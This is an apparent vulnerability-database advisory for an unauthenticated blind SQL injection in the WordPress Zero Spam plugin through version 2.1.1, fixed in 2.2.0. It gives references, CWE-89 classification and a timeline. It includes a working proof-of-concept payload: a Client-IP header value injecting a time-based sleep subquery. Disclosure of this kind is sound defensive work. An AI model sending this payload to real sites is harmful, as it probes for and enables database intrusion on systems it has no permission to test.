WordPress Zero Spam <= 2.1.1 - Unauthenticated Blind SQL Injection

Proof of Concept

HTTP request header:

Client-IP: '+(select(0)from(select(sleep(10)))v)+'

Affects Plugin

fixed in version 2.2.0

References

URL https://github.com/bmarshall511/wordpress-zero-spam/commit/269ac79aa199da629208190a24114c5551b77c71
URL https://github.com/bmarshall511/wordpress-zero-spam/issues/135
URL https://github.com/bmarshall511/wordpress-zero-spam/pull/138

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Werner Alsemgeest
Views 4133
Verified Yes
WPVDB ID 8608

Timeline

Publicly Published 2016-08-24 (almost 3 years ago)
Added 2016-08-24 (almost 3 years ago)
Last Updated 2016-11-24 (over 2 years ago)